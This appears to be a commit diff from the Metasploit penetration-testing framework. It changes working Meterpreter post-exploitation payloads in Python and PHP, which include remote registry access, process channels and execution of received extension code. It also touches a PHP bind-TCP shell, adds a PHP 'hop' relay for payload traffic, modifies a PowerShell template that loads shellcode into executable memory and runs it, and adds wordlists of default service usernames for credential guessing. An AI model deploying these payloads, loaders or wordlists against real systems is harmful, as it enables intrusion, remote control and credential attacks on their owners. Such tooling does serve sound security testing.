permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
handle_id = ctypes.c_void_p()
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
@ -1367,24 +1406,26 @@ def stdapi_registry_query_class(request, response):
@meterpreter.register_function_windll
def stdapi_registry_query_value(request, response):
REG_SZ = 1
REG_DWORD = 4
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
value_type = ctypes.c_uint32()
value_type.value = 0
value_data = (ctypes.c_ubyte * 4096)()
value_data_sz = ctypes.c_uint32()
value_data_sz.value = ctypes.sizeof(value_data)
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
if result == ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
if value_type.value == REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
elif value_type.value == REG_DWORD:
if value_type.value == winreg.REG_SZ:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
elif value_type.value == winreg.REG_DWORD:
value = value_data[:4]
value.reverse()
value = ''.join(map(chr, value))
if sys.version_info[0] < 3:
value = ''.join(map(chr, value))
else:
value = bytes(value)
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
else:
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
@ -1395,9 +1436,10 @@ def stdapi_registry_query_value(request, response):
def stdapi_registry_set_value(request, response):
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
return result, response
@meterpreter.register_function_windll

BIN
data/meterpreter/ext_server_stdapi.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/meterpreter.jar
View File

Binary file not shown.

19
data/meterpreter/meterpreter.php
View File

@ -125,6 +125,7 @@ define("TLV_META_TYPE_STRING", (1 << 16));
define("TLV_META_TYPE_UINT", (1 << 17));
define("TLV_META_TYPE_RAW", (1 << 18));
define("TLV_META_TYPE_BOOL", (1 << 19));
define("TLV_META_TYPE_QWORD", (1 << 20));
define("TLV_META_TYPE_COMPRESSED", (1 << 29));
define("TLV_META_TYPE_GROUP", (1 << 30));
define("TLV_META_TYPE_COMPLEX", (1 << 31));
@ -655,6 +656,11 @@ function tlv_pack($tlv) {
if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
}
elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
$hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
$lo = $tlv['value'] & 0xFFFFFFFF;
$ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
}
elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
}
@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
# PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
# NULL, so catch that here
$tlv['value'] = str_replace("\0", "", $tlv['value']);
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
$tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
$tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
}
@ -911,7 +924,8 @@ function read($resource, $len=null) {
$r = Array($resource);
my_print("Calling select to see if there's data on $resource");
while (true) {
$cnt = stream_select($r, $w=NULL, $e=NULL, 0);
$w=NULL;$e=NULL;$t=0;
$cnt = stream_select($r, $w, $e, $t);
# Stream is not ready to read, have to live with what we've gotten
# so far
@ -1147,7 +1161,8 @@ add_reader($msgsock);
# Main dispatch loop
#
$r=$GLOBALS['readers'];
while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
$w=NULL;$e=NULL;$t=1;
while (false !== ($cnt = select($r, $w, $e, $t))) {
#my_print(sprintf("Returned from select with %s readers", count($r)));
$read_failed = false;
for ($i = 0; $i < $cnt; $i++) {

189
data/meterpreter/meterpreter.py
View File

@ -1,12 +1,5 @@
#!/usr/bin/python
import code
try:
import ctypes
except:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
import os
import random
import select
@ -15,10 +8,30 @@ import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
if sys.version_info[0] < 3:
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
else:
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
str = lambda x: __builtins__['str'](x, 'UTF-8')
NULL_BYTE = bytes('\x00', 'UTF-8')
#
# Constants
#
DEBUGGING = False
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
@ -41,6 +54,7 @@ TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
@ -100,6 +114,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
@ -107,7 +122,7 @@ def export(symbol):
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in xrange(32))
return ''.join(random.choice(chars) for x in range(32))
@export
def inet_pton(family, address):
@ -125,25 +140,6 @@ def inet_pton(family, address):
return ''.join(map(chr, lpAddress[8:24]))
raise Exception('no suitable inet_pton functionality is available')
@export
def packet_get_tlv(pkt, tlv_type):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
return {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
return {}
@export
def packet_enum_tlvs(pkt, tlv_type = None):
offset = 0
@ -152,9 +148,11 @@ def packet_enum_tlvs(pkt, tlv_type = None):
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
val = str(val.split(NULL_BYTE, 1)[0])
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
val = struct.unpack('>Q', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
@ -163,6 +161,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
offset += tlv[0]
raise StopIteration()
@export
def packet_get_tlv(pkt, tlv_type):
try:
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
except IndexError:
return {}
return tlv
@export
def tlv_pack(*args):
if len(args) == 2:
@ -170,20 +176,35 @@ def tlv_pack(*args):
else:
tlv = args[0]
data = ""
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
else:
value = tlv['value']
if not is_bytes(value):
value = bytes(value, 'UTF-8')
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
return data
#@export
class MeterpreterFile(object):
def __init__(self, file_obj):
self.file_obj = file_obj
def __getattr__(self, name):
return getattr(self.file_obj, name)
export(MeterpreterFile)
#@export
class MeterpreterSocket(object):
def __init__(self, sock):
@ -208,11 +229,11 @@ class STDProcessBuffer(threading.Thread):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = ''
self.data = bytes()
self.data_lock = threading.RLock()
def run(self):
for byte in iter(lambda: self.std.read(1), ''):
for byte in iter(lambda: self.std.read(1), bytes()):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
@ -220,15 +241,20 @@ class STDProcessBuffer(threading.Thread):
def is_read_ready(self):
return len(self.data) != 0
def read(self, l = None):
data = ''
def peek(self, l = None):
data = bytes()
self.data_lock.acquire()
if l == None:
data = self.data
self.data = ''
else:
data = self.data[0:l]
self.data = self.data[l:]
self.data_lock.release()
return data
def read(self, l = None):
self.data_lock.acquire()
data = self.peek(l)
self.data = self.data[len(data):]
self.data_lock.release()
return data
@ -236,12 +262,25 @@ class STDProcessBuffer(threading.Thread):
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
self.echo_protection = False
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
def write(self, channel_data):
self.stdin.write(channel_data)
self.stdin.flush()
if self.echo_protection:
end_time = time.time() + 0.5
out_data = bytes()
while (time.time() < end_time) and (out_data != channel_data):
if self.stdout_reader.is_read_ready():
out_data = self.stdout_reader.peek(len(channel_data))
if out_data == channel_data:
self.stdout_reader.read(len(channel_data))
export(STDProcess)
class PythonMeterpreter(object):
@ -251,7 +290,7 @@ class PythonMeterpreter(object):
self.channels = {}
self.interact_channels = []
self.processes = {}
for func in filter(lambda x: x.startswith('_core'), dir(self)):
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
@ -265,6 +304,7 @@ class PythonMeterpreter(object):
return func
def add_channel(self, channel):
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = 0
while idx in self.channels:
idx += 1
@ -286,7 +326,7 @@ class PythonMeterpreter(object):
break
req_length, req_type = struct.unpack('>II', request)
req_length -= 8
request = ''
request = bytes()
while len(request) < req_length:
request += self.socket.recv(4096)
response = self.create_response(request)
@ -294,17 +334,17 @@ class PythonMeterpreter(object):
else:
channels_for_removal = []
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = self.channels.keys()
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = ''
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.stderr_reader.is_read_ready():
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
@ -312,7 +352,7 @@ class PythonMeterpreter(object):
try:
d = channel.recv(1)
except socket.error:
d = ''
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
@ -357,13 +397,13 @@ class PythonMeterpreter(object):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
preloadlib_methods = list(self.extension_functions.keys())
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
postloadlib_methods = list(self.extension_functions.keys())
new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
for method in new_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
@ -386,10 +426,10 @@ class PythonMeterpreter(object):
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, file):
channel.close()
elif isinstance(channel, subprocess.Popen):
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
@ -405,7 +445,7 @@ class PythonMeterpreter(object):
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, file):
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
@ -432,13 +472,13 @@ class PythonMeterpreter(object):
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, file):
data = channel.read(length)
elif isinstance(channel, STDProcess):
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
@ -454,13 +494,13 @@ class PythonMeterpreter(object):
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, file):
channel.write(channel_data)
elif isinstance(channel, subprocess.Popen):
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.stdin.write(channel_data)
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
@ -485,13 +525,17 @@ class PythonMeterpreter(object):
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
#print("[*] running method {0}".format(handler_name))
if DEBUGGING:
print('[*] running method ' + handler_name)
result, resp = handler(request, resp)
except Exception, err:
#print("[-] method {0} resulted in an error".format(handler_name))
except Exception:
if DEBUGGING:
print('[-] method ' + handler_name + ' resulted in an error')
traceback.print_exc(file=sys.stderr)
result = ERROR_FAILURE
else:
#print("[-] method {0} was requested but does not exist".format(handler_name))
if DEBUGGING:
print('[-] method ' + handler_name + ' was requested but does not exist')
result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp
@ -499,6 +543,9 @@ class PythonMeterpreter(object):
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
try:
os.setsid()
except OSError:
pass
met = PythonMeterpreter(s)
met.run()

BIN
data/meterpreter/metsrv.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll Executable file → Normal file
View File

Binary file not shown.

7
data/php/bind_tcp.php
View File

@ -9,24 +9,27 @@ if (is_callable('stream_socket_server')) {
$srvsock = stream_socket_server("tcp://{$ipaddr}:{$port}");
if (!$srvsock) { die(); }
$s = stream_socket_accept($srvsock, -1);
fclose($srvsock);
$s_type = 'stream';
} elseif (is_callable('socket_create_listen')) {
$srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$res) { die(); }
$s = socket_accept($srvsock);
socket_close($srvsock);
$s_type = 'socket';
} elseif (is_callable('socket_create')) {
$srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$res = socket_bind($srvsock, $ipaddr, $port);
if (!$res) { die(); }
$s = socket_accept($srvsock);
socket_close($srvsock);
$s_type = 'socket';
} else {
die();
}
if (!$s) { die(); }
switch ($s_type) {
switch ($s_type) {
case 'stream': $len = fread($s, 4); break;
case 'socket': $len = socket_read($s, 4); break;
}
@ -40,7 +43,7 @@ $len = $a['len'];
$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}

68
data/php/hop.php Normal file
View File

@ -0,0 +1,68 @@
<?php
$magic = 'TzGq';
$tempdir = sys_get_temp_dir() . "/hop" . $magic;
if(!is_dir($tempdir)){
mkdir($tempdir); //make sure it's there
}
//get url
$url = $_SERVER["QUERY_STRING"];
//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
//Looks for a file with a name or contents prefix, if found, send it and deletes it
function findSendDelete($tempdir, $prefix, $one=true){
if($dh = opendir($tempdir)){
while(($file = readdir($dh)) !== false){
if(strpos($file, $prefix) !== 0){
continue;
}
readfile($tempdir."/".$file);
unlink($tempdir."/".$file);
if($one){
break;
}
}
}
}
//handle control
if($url === "/control"){
if($_SERVER['REQUEST_METHOD'] === 'POST'){
//handle data for payload - save in a "down" file or the "init" file
$postdata = file_get_contents("php://input");
if(array_key_exists('HTTP_X_INIT', $_SERVER)){
$f = fopen($tempdir."/init", "w"); //only one init file
}else{
$prefix = "down_" . bin2hex($_SERVER['HTTP_X_URLFRAG']);
$f = fopen(tempnam($tempdir,$prefix), "w");
}
fwrite($f, $postdata);
fclose($f);
}else{
findSendDelete($tempdir, "up_", false);
}
}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
//get data
$postdata = file_get_contents("php://input");
//See if we should send anything down
if($postdata === 'RECV'){
findSendDelete($tempdir, "down_" . bin2hex($url));
$fname = $tempdir . "/up_recv_" . bin2hex($url); //Only keep one RECV poll
}else{
$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
}
//find free and write new file
$f = fopen($fname, "w");
fwrite($f, $magic);
//Little-endian pack length and data
$urlen = strlen($url);
fwrite($f, pack('V', $urlen));
fwrite($f, $url);
$postdatalen = strlen($postdata);
fwrite($f, pack('V', $postdatalen));
fwrite($f, $postdata);
fclose($f);
//Initial query will be a GET and have a 12345 in it
}else if(strpos($url, "12345") !== FALSE){
readfile($tempdir."/init");
}

4
data/templates/scripts/to_mem_old.ps1.template
View File

@ -11,10 +11,10 @@ $%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -n
%{shellcode}
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,[Math]::Max($%{var_code}.Length, 0x1000),0x40)
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
}
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

7
data/webcam/answerer.html
View File

@ -10,7 +10,7 @@
height: 480px;
width: 640px;
border-radius: 15px;
-moz-border-raidus: 15px;
-moz-border-radius: 15px;
background-color: black;
position: absolute;
left: 50;
@ -26,7 +26,7 @@
height: 180px;
width: 200px;
border-radius: 15px;
-moz-border-raidus: 15px;
-moz-border-radius: 15px;
background-color: #9B9B9B;
position: absolute;
top: 480;
@ -66,8 +66,9 @@
left: 10;
}
</style>
<script src="=WEBRTCAPIJS="> </script>
<script>
=WEBRTCAPIJS=
window.onerror = function(e) {
document.getElementById("message").innerHTML = "Error: " + e.toString();
}

17
data/webcam/offerer.html
View File

@ -2,6 +2,10 @@
<head>
<title>Video session</title>
<style type="text/css">
body {
background: #fff;
}
div.dot1 {
position: absolute;
width: 20px;
@ -84,8 +88,9 @@
}
</style>
<script src="api.js"> </script>
<script>
=WEBRTCAPIJS=
var channel = '=CHANNEL=';
var websocket = new WebSocket('ws://=SERVER=');
@ -136,10 +141,12 @@
};
window.onload = function() {
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
setTimeout(function(){
getUserMedia(function(stream) {
peer.addStream(stream);
peer.startBroadcasting();
});
}, 500);
};
function getUserMedia(callback) {

1214
data/wordlists/default_pass_for_services_unhash.txt Normal file
View File

File diff suppressed because it is too large Load Diff

1787
data/wordlists/default_userpass_for_services_unhash.txt Normal file
View File

File diff suppressed because it is too large Load Diff

915
data/wordlists/default_users_for_services_unhash.txt Normal file
View File

@ -0,0 +1,915 @@
admin
root
Administrator
sysadm
tech
operator
guest
security
debug
manager
service
!root
user
netman
super
diag
Cisco
Manager
DTA
apc
User
Admin
cablecom
adm
wradmin
netscreen
sa
setup
cmaker
enable
MICRO
login
write
monitor
netopia
op
adminview
sysadmin
echo
craft
maint
comcast
CSG
readonly
manuf
cusadmin
smc
sweex
disttech
su
poll
SYSDBA
anonymous
support
recovery
USERID
eng
administrator
NETWORK
JDE
Guest
rwa
USER
test
lp
ro
MAIL
ami
hsa
system
MGR
ADMINISTRATOR
FIELD
PBX
HELLO
hscroot
1502
superuser
netrangr
readwrite
piranha
wlse
l3
none
naadmin
public
NETOP
MANAGER
demo
D-Link
l2
rw
cgadmin
storwatch
vcr
OPERATOR
MDaemon
jagadmin
enquiry
at4400
davox
PFCUser
aaa
topicalt
admin2
1234
nms
client
sys
field
deskman
SYSADM
superadmin
pmd
GEN2
ADMN
Factory
PRODDTA
tellabs
spcl
dadmin
helpdesk
dhs3mt
install
adfexc
IntraSwitch
manage
superman
SPOOLMAN
ADVMAIL
vt100
PSEAdmin
patrol
teacher
PCUSER
Any
RSBCMON
cellit
inads
halt
locate
TMAR#HWMT8007079
rapport
xbox
device
NICONEX
acc
31994
bcim
websecadm
blue
topicnorm
supervisor
ccrusr
266344
telecom
GEN1
SSA
HTTP
mtch
bciim
browse
hydrasna
deskres
bbsd-client
replicator
intel
radware
intermec
mlusr
init
e250
Polycom
temp1
mac
3comcso
RMUser1
WP
NAU
rcust
mtcl
topicres
bcnas
adminuser
Root
cac_admin
mediator
Anonymous
kermit
volition
GlobalAdmin
LUCENT01
LUCENT02
adminstat
desknorm
IntraStack
e500
deskalt
cust
tiara
bcms
m1122
telco
xd
dhs3pms
VNC
customer
cisco
adminstrator
ftp_nmc
me
iclock
scmadmin
installer
webadmin
ftp_inst
DDIC
SYSTEM
draytek
EARLYWATCH
super.super
ftp_oper
corecess
weblogic
system/manager
End
d.e.b.u.g
target
MD110
tiger
adminttd
wlseuser
SAPCPIC
ftp_admi
default.password
7
2
ADMIN
itsadmin
PUBSUB
CTXSYS
ftp
bill
192.168.1.1
setpriv
GUEST
SAP*
t3admin
hello
CISCO15
1.79
mso
Telecom
qsysopr
APPS
Developer
mail
qsecofr
11111
Service
netadmin
any
db2fenc1
johnson
isp
demos
QSRV
MDSYS
vpasp
TEST
QSECOFR
1
informix
5
engmode
scout
qpgmr
ADSL
images
Gearguy
Demo
serial#
BACKUP
stratacom
6.x
mary
COMPANY
SYS
DSL
Jetform
eagle
ROUTER
ods
siteadmin
Alphanetworks
Admin1
janta
servlet
username
citel
Replicator
SYSMAN
master
SUPERUSER
cn=orcladmin
30
maintainer
BRIO_ADMIN
internal
CQSCHEMAUSER
DEV2000_DEMOS
FSFTASK1
checkfs
USER1
SQLDBA
HELP
toor
qsrvbas
SYSADMIN
EZsetup
BATCH
STRAT_USER
primenet
OEMREP
USER6
lynx
powerdown
$ALOC$
password
VOL-0215
tomcat
REP_MANAGER
WinCCConnect
ALLIN1
DIRMAINT
eqadmin
QSRVBAS
AQJAVA
LASERWRITER
PERFSTAT
apcuser
MBWATCH
system_admin
unix
OWNER
NETPRIV
VSEMAINT
DEMO
SYMPA
REP_OWNER
DCL
FAX
ARCHIVIST
VTAMUSER
VMTAPE
basisk
NetLinx
OutOfBox
NETMGR
DEFAULT
OAS_PUBLIC
read
AP
MTSSYS
SYSMAINT
AUDIOUSER
Joe
IDMS
$SRV
snake
ROOT
PRINTER
shutdown
satan
RDM470
trouble
fax
OP1
admin@example.com
HOST
ADLDEMO
QS_ADM
bin
OPER
oracle
jj
PO7
www
joe
MAINT
CMSBATCH
CCC
role1
DATAMOVE
MSHOME
ISPVM
crowd­-openid-­server
user_editor
sedacm
db2admin
Airaya
SYSDUMP1
IMEDIA
primos_cs
USER_TEMPLATE
pnadmin
lpadmin
VTAM
TRACESVR
POSTMASTER
MAILER
RSCSV2
QS_WS
circ
nobody
Tasman
DISCOVERER_ADMIN
VMASMON
LR-ISDN
TURBINE
GL
PO
PRINT
MODTEST
GATEWAY
PRIMARY
both
haasadm
pw
games
DOCSIS_APP
bbs
EMP
postmaster
SITEMINDER
vgnadmin
RJE
gonzo
NEWS
AQUSER
UTLBSTATU
netbotz
xmi_demo
ORACACHE
MCUser
prash
sync
PM
AP2SVP
ibm
ULTIMATE
SABRE
user_pricer
SUPERVISOR
EVENT
PORTAL30_SSO_PS
FSFADMIN
OO
WKSYS
OPERATNS
UVPIM_
OE
OCITEST
web
ESSEX
None
CTXDEMO
user_designer
QDBA
role
LRISDN
tele
WEBCAL01
rsadmin
OMWB_EMULATION
WINDOWS_PASSTHRU
MOREAU
fast
host
ORDPLUGINS
SYSWRM
savelogs
SDOS_ICSAP
DSSYS
